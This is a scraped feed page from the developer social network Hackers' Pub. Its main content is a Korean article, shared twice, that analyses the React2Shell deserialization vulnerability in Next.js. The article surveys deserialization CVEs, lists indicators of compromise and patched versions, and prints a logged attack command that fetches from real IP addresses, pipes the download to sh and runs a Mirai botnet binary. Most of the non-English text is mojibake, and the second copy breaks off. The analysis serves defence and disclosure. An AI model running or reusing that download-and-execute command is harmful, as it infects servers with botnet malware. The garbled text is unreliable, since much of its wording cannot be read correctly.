Hackers' Pub is a place for software engineers to share their knowledge and experience with each other. It's also an ActivityPub-enabled social network, so you can follow your favorite hackers in the fediverse and get their latest posts in your feed.
โใใฉใณในใใฉใใขใซๅฏพใใฆไธญๆใ็ซใฆใฆใใใญใฃใญใใใใ
ใใ
ใใใใใใชใขใฏใทใงใณใใใๆๅคงๆตใจใญ็ตตใ่ใๅใใฆใโ
โ
See to me this is the value of pride flags: they're an extra layer of visual symbolism you can put into a design if you want. I like them better as vague visual motifs than as sharply defined quasi-nationalistic standards.
I forgot how nice it is when winter hits and it's cold and dark and I get to enjoy the parks all by myself
"Choose" I think the word you were looking for there was "choose."
๋ฐ shared the below article:
๊ณ ๋จํ @gnh1201@hackers.pub
์ธ๋ถ์์ ์์ ๋ ํน์ ํ ๊ท๊ฒฉ์ ๋ฐ๋ผ ๊ตฌ์กฐ์ ์ผ๋ก ์์ฑ๋ ๋ฐ์ดํฐ๋ฅผ ์ฒ๋ฆฌํ๋ค๋ฉด, ๊ณต๊ฒฉ์๊ฐ ์ด๋ ํ ์๋๋ฅผ ๊ฐ์ง๊ณ ์๋ค๋ฉด ๋ฐ์ดํฐ๋ฅผ ๋ณด๋ผ ๋ ์คํ ๊ฐ๋ฅํ ์ ์์ ์ฝ๋๋ฅผ ๊ฐ์ด ๋ฃ์ด ๋ณด๋ผ ๊ฐ๋ฅ์ฑ์ ๋ฐฐ์ ํ ์ ์๋ค.
์ด๊ฒ์ด ๋ณด์ ์ฝ์ ์ด ๋์ง ์๊ธฐ ์ํด์ ์ด๋ฌํ ๊ณต๊ฒฉ์์ ์๋๋ฅผ ๋ง์์ผํ์ง๋ง, React2Shell (CVE-2025-55182) ์ทจ์ฝ์ ์ ์ด๋ฌํ ๊ณต๊ฒฉ์์ ์๋๋ฅผ ๋ง์ง ๋ชปํ๊ณ ์คํ์ ๋ฌด์ ํ ํ์ฉํ๋ ๋ฐฉ๋ฒ์ด ๋ฐ๊ฒฌ๋ ๊ฒ์ด๋ค.
ํน์ ํ ๊ท๊ฒฉ์ ๋ฐ๋ผ ๊ตฌ์กฐ์ ์ผ๋ก ์์ฑ๋ ๋ฐ์ดํฐ๋ฅผ ์ฒ๋ฆฌํ๋ ๊ณผ์ ์ ์ผ์ปซ๋ ์ฉ์ด๋ฅผ "์ญ์ง๋ ฌํ"(Deserialization)์ด๋ผ๊ณ ํ๋ค.
ํน์ ํ ๊ท๊ฒฉ์ ์ ์๋ ค์ง JSON, XML, YAML๊ฐ ๋ ์๋ ์๊ณ , ์์ฒด ๊ท๊ฒฉ์ด ๋ ์๋ ์๊ณ , ํผํฉํ์ด ๋ ์๋ ์๋ค. React2Shell ์ทจ์ฝ์ ์ ํผํฉํ(JSON + aka. Flight)์ ์ฌ์ฉํ์๋ค.
์์ฒด ๊ท๊ฒฉ(aka. Flight)์ด JavaScript๋ก ์ ์๋ ๊ฐ์ฒด์ ์ฑ๊ฒฉ์ ์์๋ก ๋ณ๊ฒฝ(Prototype ๊ฐ๋
์ ์กด์ฌํ๋ ์์ฑ์ ์์ค์ ์์ฑ(__proto__, constructor)์ ์ ๊ทผํ์ฌ ๊ฐ์ฒด์ ์ฑ๊ฒฉ์ ์์๋ก ๋ฐ๊ฟ ์ ์์)ํ๋๋ฐ ํ์ํ ์ ๊ทผ์ฑ์ ๊ฐ์ง๊ณ ์์๊ธฐ์ ๊ฐ๋ฅํ ๊ฒ์ด์๋ค.
์ค๋ฌด์ ์ผ๋ก ์ญ์ง๋ ฌํ ๊ณผ์ ์ด ์ํํด์ง๋ ์ด์ ๋ ๋ค์๊ณผ ๊ฐ๋ค.
์ด ์ธ์๋ ์ญ์ง๋ ฌํ ๊ณผ์ ์ ์ ์ฌํ ์ฌ๋ฌ ์ทจ์ฝ ๊ฐ๋ฅ์ฑ์ ๊ฐ์ง๊ณ ์๊ธฐ ๋๋ฌธ์, ์ญ์ง๋ ฌํ ๊ณผ์ ์ ๋ณดํธํ๊ธฐ ์ํ ์ฌ๋ฌ ๋ณด์ ์ฅ์น์ ๊ตฌํ์ด ํ์ํ๋ค.
์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ด ์ด๋ค ์ฑ๊ฒฉ์ ๊ฐ์ง๋ ์ทจ์ฝ์ ์ธ์ง ๋น ๋ฅด๊ฒ ์ดํดํ๊ธฐ ์ํด์ , ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ๊ณผ ์ฐ๊ด์ด ์๋ ์ทจ์ฝ์ ์ฌ๋ก์ ๊ณตํต์ ์ธ ํน์ง์ ์ดํด๋ณผ ์ ์๋ค. ๊ทธ ์ฌ๋ก๋ ๋ค์๊ณผ ๊ฐ๋ค.
| ์ธ์ด / ์ํ๊ณ | ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ฌ๋ก | ์ฃผ์ ๊ณตํต์ |
|---|---|---|
| Java | CVE-2021-44228 (Log4Shell), CVE-2017-9805 (Apache Struts2 REST), CVE-2020-8840 (jackson-databind) | ์ธ๋ถ ์ ๋ ฅ์ด ๊ฐ์ฒด ์์ฑยท์ญ์ง๋ ฌํ ๊ฒฝ๋ก(JNDI, XML/JSON ๋ฐ์ธ๋ฉ) ๋ก ์ ์ ๋์ด gadget chain ๋๋ ์๊ฒฉ ํด๋์ค ๋ก๋ฉ์ ํตํด RCE ๋ฐ์ |
| .NET (C# / VB.NET) | CVE-2019-18935 (Telerik UI), CVE-2025-53690 (Sitecore ViewState), CVE-2020-25258 (Hyland OnBase) | BinaryFormatterยทViewState ๋ฑ ๋ ๊ฑฐ์ ์ญ์ง๋ ฌํ ํฌ๋งท์ ์ ๋ขฐํ์ฌ ์์ ํ์
๋ก๋ฉยท์ฝ๋ ์คํ |
| Python | CVE-2017-18342 (PyYAML unsafe load), CVE-2024-9701 (Kedro ShelveStore), CVE-2024-5998 (LangChain FAISS) | pickleยทunsafe YAML ๋ก๋ ์ฌ์ฉ์ผ๋ก ์ญ์ง๋ ฌํ ์์ฒด๊ฐ ์คํ ํธ๋ฆฌ๊ฑฐ |
| PHP (WP) | CVE-2023-6933 (Better Search Replace), CVE-2025-0724 (ProfileGrid), CVE-2024-5488 (SEOPress) | unserialize() / maybe_unserialize()์ ์ฌ์ฉ์ ์
๋ ฅ์ด ์ ๋ฌ๋์ด PHP Object Injection(POP chain) ๋ฐ์ |
| Ruby | CVE-2013-0156 (Rails YAML.load), CVE-2020-10663 (RubyGems Marshal) | YAML.loadยทMarshal.load ์ฌ์ฉ ์ ์์ ๊ฐ์ฒด ์์ฑ โ ์ฝ๋ ์คํ |
| JavaScript / Node.js | CVE-2025-55182 (React2Shell), CVE-2020-7660 (serialize-javascript) | ๊ตฌ์กฐ ๋ณต์ยท๊ฐ์ฒด ์ฌ๊ตฌ์ฑ ๋ก์ง์ด ์ ๋ขฐ๋์ง ์์ ์ ๋ ฅ์ ์ฝ๋/๊ฐ์ฒด๋ก ํด์ |
| Go | CVE-2022-28948 (go-yaml Unmarshal), CVE-2020-16845 (HashiCorp Consul) | Unmarshal ๋จ๊ณ์์ ์ ๋ ฅ ๊ฒ์ฆ ๋ถ์กฑ โ ๊ตฌ์กฐ์ฒด ๋ณต์ ๊ธฐ๋ฐ ๋ก์ง ๋ถ๊ดดยทDoS |
| Rust | GHSA-w428-f65r-h4q2 (serde_yaml / unsafe deserialization, CVE-2021-45687) | ๋ฉ๋ชจ๋ฆฌ ์์ ๊ณผ ๋ฌด๊ดํ๊ฒ serde ๊ธฐ๋ฐ ์ญ์ง๋ ฌํ์์ ์ ๋ขฐ๋์ง ์์ ๋ฐ์ดํฐ๊ฐ ๋ด๋ถ ํ์ ์ผ๋ก ๋ณต์๋์ด ๋ก์ง ์ค์ผยทDoSยท์ ์ฌ์ ์ฝ๋ ์คํ ์ํ |
| Kotlin / Android | CVE-2024-43080 (Android) / CVE-2024-10382 (Android Car) | Intent/Bundle/IPC ์ญ์ง๋ ฌํ ์ ํ์ ยท๊ฒ์ฆ ๋ฏธํก โ ๊ถํ ์์นยทDoS |
| C / C++ | CVE-2024-8375 (Google Reverb, Related to gRPC and protobuf) | Unpack ๊ณผ์ ์์ ๋ฐ์ดํฐํ์
(VARIANT), vtable ํฌ์ธํฐ ์ค์ผ ๋ฑ ๋ฌด๊ฒฐ์ฑ ๊ฒ์ฆ ๋ถ์กฑ |
| Swift / iOS | CVE-2021-32742 (Vapor) | ์ธ๋ถ ์ ๋ ฅ์ ๋์ฝ๋ฉ/๊ฐ์ฒด ๋ณต์ ์ ์ ๋ขฐ ๊ฒฝ๊ณ ๋ถ๊ดด โ DoSยท์ ๋ณด ๋ ธ์ถ |
| ์ฐ์ ์ฉ (ICS/OT) | CVE-2024-12703, CVE-2023-27978 (Schneider Electric), CVE-2025-2566 (Kaleris Navis N4), CVE-2023-32737 (Siemens SIMATIC) | ํ๋ก์ ํธ ํ์ผยท๊ด๋ฆฌ ์๋ฒ ์ ๋ ฅ์ ์ ๋ขฐ๋ ๋ด๋ถ ๋ฐ์ดํฐ๋ก ๊ฐ์ ํ๊ณ ์ญ์ง๋ ฌํ โ RCE ๋ฐ ๋ฌผ๋ฆฌ ์์คํ ์ํฅ ๊ฐ๋ฅ |
์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ ์ธ์ด์ ํ๊ฒฝ์ ๊ฐ๋ฆฌ์ง ์๊ณ ๋ค์ํ๊ฒ ๋ํ๋๊ณ ์์ผ๋ฉฐ, ๋ฐ๊ฒฌ๋ ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ ์ทจ์ฝ์ ์ ์(CVSS 3.x)์์๋ 8.0์์ 10.0 ๋ฒ์์ ๋งค์ฐ ๋์ ์ ์๋ฅผ ๋ฐ๊ณ ์๋ค.
์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ด ์ด๋ค ๊ณตํต์ ์ธ ํน์ฑ์ ๊ฐ์ง๋์ง ์ค๋ช ํ์ผ๋, ์ด์ React2Shell ๊ณต๊ฒฉ์ ๊ฐ๋ ์ฆ๋ช (PoC)์์ ๋ณด์ธ ๊ณต๊ฒฉ ํน์ฑ์ ์ฌ์ ์ ๋ณด(๊ณต๊ฒฉ ๋์์ธ RSC์ ๋ด๋ถ ์ดํด)๊ฐ ์์ด๋ ์ด๋์ ๋ ํ์ ํ ์ ์๋ค.
์ฌ๊ธฐ ๊ฐ๊ฐ JavaScript์ Python์ผ๋ก ์์ฑ๋ ์ฃผ์ ๊ณต๊ฒฉ ๊ฐ๋ ์ฆ๋ช ์ฝ๋๊ฐ ์๋ค.
์ฌ๊ธฐ์ ์ ์ ์๋ ์ ๋ณด๋ ๋ค์๊ณผ ๊ฐ๋ค.
mcc
ํ์จ
Quincy__proto__, constructor )๋ฅผ ํตํด Prototype์ ๋ณ์กฐํ ์ ์๋ ์ ๊ทผ์ฑ์ ๊ฐ์ง๊ณ ์๋ค๋ ๊ฒ์ ์ ์ ์๋ค. ์ฉ์ด๋ก๋ "JavaScript prototype pollution"๋ผ๊ณ ํ๋ค.then ํค์๋๋ฅผ ํตํด ๊ณต๊ฒฉ ๋์ ๋ด๋ถ์ ์กด์ฌํ๋ Promise ๊ฐ์ฒด์ ๋ถ๊ฒ ๋ค(๋๋ ์๋ก์ด Promise ๊ฐ์ฒด๋ฅผ ๋ง๋ค๊ฒ ๋ค)๋ ์๋๋ฅผ ํ์ธํ ์ ์๋ค.value ํ๋ ๊ฐ์ด ์์ง ์ญ์ง๋ ฌํ ๋๊ธฐ ์ ์ ๋ฌธ์์ด ํํ์ JSON์ธ ๊ฒ์ผ๋ก ๋ดค์ ๋, ๊ณต๊ฒฉ ๋์ ๋ด๋ถ์์ JSON.parse ๋ฉ์๋์ ํธ์ถ์ ์์ํ ์ ์๋ค._response._prefix ์ ์ฃผ์
์ then ํค์๋๊ฐ ๋ฑ์ฅํ๋ ์์น์ ์ต๋ํ ๊ฐ๊น์ด ๊ณณ์์ ์ผ์ด๋์ผ ํ๋ค. ๊ทธ๋์ผ Promise ๊ฐ์ฒด๊ฐ ๊ณต๊ฒฉ ์ฝ๋๋ฅผ ํธ๋ฆฌ๊ฑฐํ ์ ์๊ธฐ ๋๋ฌธ์ด๋ค.then ์์ฑ์ ๊ฐ์ง๋ฉด์, ๊ณต๊ฒฉ ์ฝ๋๋ฅผ ์์ฉํ ์ ์๋ ๊ฐ์ฅ ์ฐ๊ด์ฑ ๋์ ํํ์ด๋ผ๋ ์ ์ ๋ชจ๋ ๋ง์กฑํ๋ ๋ถ๋ถ์ {"then": "$Bx"}๋ผ๋ ๊ฒ์ ์ ์ ์๋ค. $Bx๋ฅผ ์ฒ๋ฆฌํ๋ ๊ณผ์ ์ค (๋๋ $Bx๊ฐ ์ฒ๋ฆฌํ ๊ฒฐ๊ณผ์ ๋ํ ์ฌํ) ๊ฒ์ฆ์ด ๋ถ์กฑํ๋ค๋ ์๋ฏธ์ด๋ค.Next-Action ํค๋๋ ์ ์ด์ ์ด ์ทจ์ฝ์ ์ ์์ธ์ด ๋ ์ด๋ค ๊ธฐ๋ฅ์ ์ผ๊ณ ๋๋ ๊ฒ์ ๊ดํ ๊ฒ์์ ์์ํ ์ ์๋ค. ๊ฐ๋ฐ๋ ์ฑ์ ์กด์ฌํ๋ ์ ํจํ ์ก์
์ ๋ํ Key๋ฅผ ์ ์ ์๋ค๋ฉด ๊ทธ ์ก์
์ ์คํ์ ์์ฒญํจ์ผ๋ก์ ๊ณต๊ฒฉ ์ฝ๋ ๋ํ ์คํํ ์ ์์ ๊ฒ์ด๋ค.Catswords OSS๋ก ์ ๋ณด๋ ๋ด์ฉ์ ๋ฐ๋ฅด๋ฉด, React2Shell์ ๋ ธ์ถ๋ ์๋ฒ๋ ์ด๋ฐ ๋ช ๋ น์ด ๋ค์ด์จ๋ค๊ณ ํ๋ค. ํ ํ์์ด ํ์ต์ฉ์ผ๋ก ๊ตฌ์ถํ React ์๋ฒ์์ ๋ฐ๊ฒฌ๋ ๋ก๊ทธ์ด๋ค.
(busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh; \
cd /dev; \
busybox wget http://31.56.27.76/n2/x86; \
chmod 777 x86; \
./x86 reactOnMynuts)์ด ํ์ผ์ ์ ์ฒด๋ Mirai botnet์ด๋ผ ๋ถ๋ฅด๋ ๊ณ์ด์ ์ ์ฑ์ฝ๋์ด๋ค. React2Shell์ ์ทจ์ฝํ ์๋ฒ๋ค์ ์ด๋ฐ ์ ์ฑ์ฝ๋๋ค์ ์๋ฒ์ ์ฃผ์ ๋ฐ๊ฒ ๋๋ค.
๊ทธ๋ผ ์ด ์ ์ฑ์ฝ๋์ ๋ช ์ฑ(?)์ ์ด๋์ ๋์ผ์ง ํ๋ฒ ์ฒดํฌํด๋ณด์.
(๊ทธ๋ ๋ ๋์๊ฑฐ ์์์ผ๋ ๊ทธ๋ง ์์๋ณด์)
๊ด๋ จ IoC ๋ ๋ค์๊ณผ ๊ฐ๋ค.
3ba4d5e0cf0557f03ee5a97a2de56511 (MD5)858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (SHA256)http://193.34.213.150/nuts/bolts (URL)http://31.56.27.76/n2/x86 (URL)๋ฒ์ฉ botnet์ด ์ค์น๋๊ธฐ ๋๋ฌธ์ ์ฌ์ค์ DDoS ๊ณต๊ฒฉ ๋ฑ ๋ค์ํ ๋ชฉ์ ์ผ๋ก ์ ์ฉ๋๋ ์๋ฒ๊ฐ ๋๋ค.
์ถ๊ฐ ๋ถ์์ ์๋ ๋งํฌ์์ ํ์ธํ ์ ์๋ค.
Next.js๋ฅผ ์ฌ์ฉํ๋ ์๋ฒ๋ผ๋ฉด ์ทจ์ฝ์ ์ด ํด๊ฒฐ๋ ๋ฒ์ ์ผ๋ก ์ ๋ฐ์ดํธํ์ฌ์ผ ํ๋ค. Next.js์ ๊ฐ๋ฐ์ฌ Vercel์ ์ทจ์ฝํ ๋ฒ์ ์ ๋ํด ๋ค์๊ณผ ๊ฐ์ด ์๋ดํ๊ณ ์๋ค.
| Vulnerable version | Patched release |
|---|---|
| Next.js 15.0.x | 15.0.5 |
| Next.js 15.1.x | 15.1.9 |
| Next.js 15.2.x | 15.2.6 |
| Next.js 15.3.x | 15.3.6 |
| Next.js 15.4.x | 15.4.8 |
| Next.js 15.5.x | 15.5.7 |
| Next.js 16.0.x | 16.0.10 |
| Next.js 14 canaries after 14.3.0-canary.76 | Downgrade to 14.3.0-canary.76 (not vulnerable) |
| Next.js 15 canaries before 15.6.0-canary.58 | 15.6.0-canary.58 |
| Next.js 16 canaries before 16.1.0-canary.12 | 16.1.0-canary.12 and after |
ํน์ฌ ์ ๋ฐ์ดํธ์ ๊ณค๋์ ๊ฒช๊ณ ์๋ ๊ฒฝ์ฐ, Vercel์์ ๊ณต์ ์ ๊ณตํ๋ ํจ์น ๋๊ตฌ๋ฅผ ํ์ฉํ๋ ๊ฒ๋ ์ข์ ๋ฐฉ๋ฒ์ด ๋ ์ ์๋ค.
Next-Action ํค๋ + ์์คํ
OS ๋ช
๋ น์ด + ์๋ฐ์คํฌ๋ฆฝํธ์ Array ๋๋ Object ๊ด๋ จ ๋ฉ์๋, ์ด๋ ๊ฒ 3์์๊ฐ ๊ฐ์ ์์ฒญ์ ๋์์ ๋ค์ด์๋๊ฑด ํํ ์ํฉ์ ์๋๋ผ๋ ์ ์ ๊ณ ๋ คํด์ ์ฐจ๋จ ๊ท์น์ ๋ง๋๋ ๊ฒ๋ ๋ฐฉ๋ฒ์ด ๋ ์ ์๋ค.
โใใฉใณในใใฉใใขใซๅฏพใใฆไธญๆใ็ซใฆใฆใใใญใฃใญใใใใใใใปใใจๅฅฝใใใใ
it's truly amazing what LLMs can achieve. we now know it's possible to produce an html5 parsing library with nothing but the full source code of an existing html5 parsing library, all the source code of all other open source libraries ever, a meticulously maintained and extremely comprehensive test suite written by somebody else, 5 different models, a megawatt-hour of energy, a swimming pool full of water, and a month of spare time of an extremely senior engineer
if mozilla is really serious about privacy they should hire the ublock origin creator and make him ceo
I ported JustHTML from Python to JavaScript with Codex CLI and GPT-5.2 in hours
Link: https://simonwillison.net/2025/Dec/15/porting-justhtml/
Discussion: https://news.ycombinator.com/item?id=46295771
The Web Beneath the Waves by Samanth Subramanian, 2025
We think of the Internet as wireless, weightless, ever-presentโbut its true foundation lies in the ocean's depths, where nearly 900,000 miles of fiber-optic cables quietly pulse with all the world's information.
It seems the time has come to seriously consider migrating to another platform like Codeberg...
But, GitHub is also another side to it, that's a Social Platform. This is getting in the way migrating to Codeberg.
์ค๋์ ์ค๋ ์์์ด์๋ ๋ฆฌ๋ทฐ ์ค "invariant" ๋งํ๊ธฐ๋ฅผ ๋ฌ์ฑํ๋ค
ๆดช ๆฐๆ (Hong Minhee) shared the below article:
๊ณ ๋จํ @gnh1201@hackers.pub
์ธ๋ถ์์ ์์ ๋ ํน์ ํ ๊ท๊ฒฉ์ ๋ฐ๋ผ ๊ตฌ์กฐ์ ์ผ๋ก ์์ฑ๋ ๋ฐ์ดํฐ๋ฅผ ์ฒ๋ฆฌํ๋ค๋ฉด, ๊ณต๊ฒฉ์๊ฐ ์ด๋ ํ ์๋๋ฅผ ๊ฐ์ง๊ณ ์๋ค๋ฉด ๋ฐ์ดํฐ๋ฅผ ๋ณด๋ผ ๋ ์คํ ๊ฐ๋ฅํ ์ ์์ ์ฝ๋๋ฅผ ๊ฐ์ด ๋ฃ์ด ๋ณด๋ผ ๊ฐ๋ฅ์ฑ์ ๋ฐฐ์ ํ ์ ์๋ค.
์ด๊ฒ์ด ๋ณด์ ์ฝ์ ์ด ๋์ง ์๊ธฐ ์ํด์ ์ด๋ฌํ ๊ณต๊ฒฉ์์ ์๋๋ฅผ ๋ง์์ผํ์ง๋ง, React2Shell (CVE-2025-55182) ์ทจ์ฝ์ ์ ์ด๋ฌํ ๊ณต๊ฒฉ์์ ์๋๋ฅผ ๋ง์ง ๋ชปํ๊ณ ์คํ์ ๋ฌด์ ํ ํ์ฉํ๋ ๋ฐฉ๋ฒ์ด ๋ฐ๊ฒฌ๋ ๊ฒ์ด๋ค.
ํน์ ํ ๊ท๊ฒฉ์ ๋ฐ๋ผ ๊ตฌ์กฐ์ ์ผ๋ก ์์ฑ๋ ๋ฐ์ดํฐ๋ฅผ ์ฒ๋ฆฌํ๋ ๊ณผ์ ์ ์ผ์ปซ๋ ์ฉ์ด๋ฅผ "์ญ์ง๋ ฌํ"(Deserialization)์ด๋ผ๊ณ ํ๋ค.
ํน์ ํ ๊ท๊ฒฉ์ ์ ์๋ ค์ง JSON, XML, YAML๊ฐ ๋ ์๋ ์๊ณ , ์์ฒด ๊ท๊ฒฉ์ด ๋ ์๋ ์๊ณ , ํผํฉํ์ด ๋ ์๋ ์๋ค. React2Shell ์ทจ์ฝ์ ์ ํผํฉํ(JSON + aka. Flight)์ ์ฌ์ฉํ์๋ค.
์์ฒด ๊ท๊ฒฉ(aka. Flight)์ด JavaScript๋ก ์ ์๋ ๊ฐ์ฒด์ ์ฑ๊ฒฉ์ ์์๋ก ๋ณ๊ฒฝ(Prototype ๊ฐ๋
์ ์กด์ฌํ๋ ์์ฑ์ ์์ค์ ์์ฑ(__proto__, constructor)์ ์ ๊ทผํ์ฌ ๊ฐ์ฒด์ ์ฑ๊ฒฉ์ ์์๋ก ๋ฐ๊ฟ ์ ์์)ํ๋๋ฐ ํ์ํ ์ ๊ทผ์ฑ์ ๊ฐ์ง๊ณ ์์๊ธฐ์ ๊ฐ๋ฅํ ๊ฒ์ด์๋ค.
์ค๋ฌด์ ์ผ๋ก ์ญ์ง๋ ฌํ ๊ณผ์ ์ด ์ํํด์ง๋ ์ด์ ๋ ๋ค์๊ณผ ๊ฐ๋ค.
์ด ์ธ์๋ ์ญ์ง๋ ฌํ ๊ณผ์ ์ ์ ์ฌํ ์ฌ๋ฌ ์ทจ์ฝ ๊ฐ๋ฅ์ฑ์ ๊ฐ์ง๊ณ ์๊ธฐ ๋๋ฌธ์, ์ญ์ง๋ ฌํ ๊ณผ์ ์ ๋ณดํธํ๊ธฐ ์ํ ์ฌ๋ฌ ๋ณด์ ์ฅ์น์ ๊ตฌํ์ด ํ์ํ๋ค.
์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ด ์ด๋ค ์ฑ๊ฒฉ์ ๊ฐ์ง๋ ์ทจ์ฝ์ ์ธ์ง ๋น ๋ฅด๊ฒ ์ดํดํ๊ธฐ ์ํด์ , ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ๊ณผ ์ฐ๊ด์ด ์๋ ์ทจ์ฝ์ ์ฌ๋ก์ ๊ณตํต์ ์ธ ํน์ง์ ์ดํด๋ณผ ์ ์๋ค. ๊ทธ ์ฌ๋ก๋ ๋ค์๊ณผ ๊ฐ๋ค.
| ์ธ์ด / ์ํ๊ณ | ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ฌ๋ก | ์ฃผ์ ๊ณตํต์ |
|---|---|---|
| Java | CVE-2021-44228 (Log4Shell), CVE-2017-9805 (Apache Struts2 REST), CVE-2020-8840 (jackson-databind) | ์ธ๋ถ ์ ๋ ฅ์ด ๊ฐ์ฒด ์์ฑยท์ญ์ง๋ ฌํ ๊ฒฝ๋ก(JNDI, XML/JSON ๋ฐ์ธ๋ฉ) ๋ก ์ ์ ๋์ด gadget chain ๋๋ ์๊ฒฉ ํด๋์ค ๋ก๋ฉ์ ํตํด RCE ๋ฐ์ |
| .NET (C# / VB.NET) | CVE-2019-18935 (Telerik UI), CVE-2025-53690 (Sitecore ViewState), CVE-2020-25258 (Hyland OnBase) | BinaryFormatterยทViewState ๋ฑ ๋ ๊ฑฐ์ ์ญ์ง๋ ฌํ ํฌ๋งท์ ์ ๋ขฐํ์ฌ ์์ ํ์
๋ก๋ฉยท์ฝ๋ ์คํ |
| Python | CVE-2017-18342 (PyYAML unsafe load), CVE-2024-9701 (Kedro ShelveStore), CVE-2024-5998 (LangChain FAISS) | pickleยทunsafe YAML ๋ก๋ ์ฌ์ฉ์ผ๋ก ์ญ์ง๋ ฌํ ์์ฒด๊ฐ ์คํ ํธ๋ฆฌ๊ฑฐ |
| PHP (WP) | CVE-2023-6933 (Better Search Replace), CVE-2025-0724 (ProfileGrid), CVE-2024-5488 (SEOPress) | unserialize() / maybe_unserialize()์ ์ฌ์ฉ์ ์
๋ ฅ์ด ์ ๋ฌ๋์ด PHP Object Injection(POP chain) ๋ฐ์ |
| Ruby | CVE-2013-0156 (Rails YAML.load), CVE-2020-10663 (RubyGems Marshal) | YAML.loadยทMarshal.load ์ฌ์ฉ ์ ์์ ๊ฐ์ฒด ์์ฑ โ ์ฝ๋ ์คํ |
| JavaScript / Node.js | CVE-2025-55182 (React2Shell), CVE-2020-7660 (serialize-javascript) | ๊ตฌ์กฐ ๋ณต์ยท๊ฐ์ฒด ์ฌ๊ตฌ์ฑ ๋ก์ง์ด ์ ๋ขฐ๋์ง ์์ ์ ๋ ฅ์ ์ฝ๋/๊ฐ์ฒด๋ก ํด์ |
| Go | CVE-2022-28948 (go-yaml Unmarshal), CVE-2020-16845 (HashiCorp Consul) | Unmarshal ๋จ๊ณ์์ ์ ๋ ฅ ๊ฒ์ฆ ๋ถ์กฑ โ ๊ตฌ์กฐ์ฒด ๋ณต์ ๊ธฐ๋ฐ ๋ก์ง ๋ถ๊ดดยทDoS |
| Rust | GHSA-w428-f65r-h4q2 (serde_yaml / unsafe deserialization, CVE-2021-45687) | ๋ฉ๋ชจ๋ฆฌ ์์ ๊ณผ ๋ฌด๊ดํ๊ฒ serde ๊ธฐ๋ฐ ์ญ์ง๋ ฌํ์์ ์ ๋ขฐ๋์ง ์์ ๋ฐ์ดํฐ๊ฐ ๋ด๋ถ ํ์ ์ผ๋ก ๋ณต์๋์ด ๋ก์ง ์ค์ผยทDoSยท์ ์ฌ์ ์ฝ๋ ์คํ ์ํ |
| Kotlin / Android | CVE-2024-43080 (Android) / CVE-2024-10382 (Android Car) | Intent/Bundle/IPC ์ญ์ง๋ ฌํ ์ ํ์ ยท๊ฒ์ฆ ๋ฏธํก โ ๊ถํ ์์นยทDoS |
| C / C++ | CVE-2024-8375 (Google Reverb, Related to gRPC and protobuf) | Unpack ๊ณผ์ ์์ ๋ฐ์ดํฐํ์
(VARIANT), vtable ํฌ์ธํฐ ์ค์ผ ๋ฑ ๋ฌด๊ฒฐ์ฑ ๊ฒ์ฆ ๋ถ์กฑ |
| Swift / iOS | CVE-2021-32742 (Vapor) | ์ธ๋ถ ์ ๋ ฅ์ ๋์ฝ๋ฉ/๊ฐ์ฒด ๋ณต์ ์ ์ ๋ขฐ ๊ฒฝ๊ณ ๋ถ๊ดด โ DoSยท์ ๋ณด ๋ ธ์ถ |
| ์ฐ์ ์ฉ (ICS/OT) | CVE-2024-12703, CVE-2023-27978 (Schneider Electric), CVE-2025-2566 (Kaleris Navis N4), CVE-2023-32737 (Siemens SIMATIC) | ํ๋ก์ ํธ ํ์ผยท๊ด๋ฆฌ ์๋ฒ ์ ๋ ฅ์ ์ ๋ขฐ๋ ๋ด๋ถ ๋ฐ์ดํฐ๋ก ๊ฐ์ ํ๊ณ ์ญ์ง๋ ฌํ โ RCE ๋ฐ ๋ฌผ๋ฆฌ ์์คํ ์ํฅ ๊ฐ๋ฅ |
์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ ์ธ์ด์ ํ๊ฒฝ์ ๊ฐ๋ฆฌ์ง ์๊ณ ๋ค์ํ๊ฒ ๋ํ๋๊ณ ์์ผ๋ฉฐ, ๋ฐ๊ฒฌ๋ ์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ ์ทจ์ฝ์ ์ ์(CVSS 3.x)์์๋ 8.0์์ 10.0 ๋ฒ์์ ๋งค์ฐ ๋์ ์ ์๋ฅผ ๋ฐ๊ณ ์๋ค.
์ญ์ง๋ ฌํ ์ทจ์ฝ์ ์ด ์ด๋ค ๊ณตํต์ ์ธ ํน์ฑ์ ๊ฐ์ง๋์ง ์ค๋ช ํ์ผ๋, ์ด์ React2Shell ๊ณต๊ฒฉ์ ๊ฐ๋ ์ฆ๋ช (PoC)์์ ๋ณด์ธ ๊ณต๊ฒฉ ํน์ฑ์ ์ฌ์ ์ ๋ณด(๊ณต๊ฒฉ ๋์์ธ RSC์ ๋ด๋ถ ์ดํด)๊ฐ ์์ด๋ ์ด๋์ ๋ ํ์ ํ ์ ์๋ค.
์ฌ๊ธฐ ๊ฐ๊ฐ JavaScript์ Python์ผ๋ก ์์ฑ๋ ์ฃผ์ ๊ณต๊ฒฉ ๊ฐ๋ ์ฆ๋ช ์ฝ๋๊ฐ ์๋ค.
์ฌ๊ธฐ์ ์ ์ ์๋ ์ ๋ณด๋ ๋ค์๊ณผ ๊ฐ๋ค.
Abhinav ๐
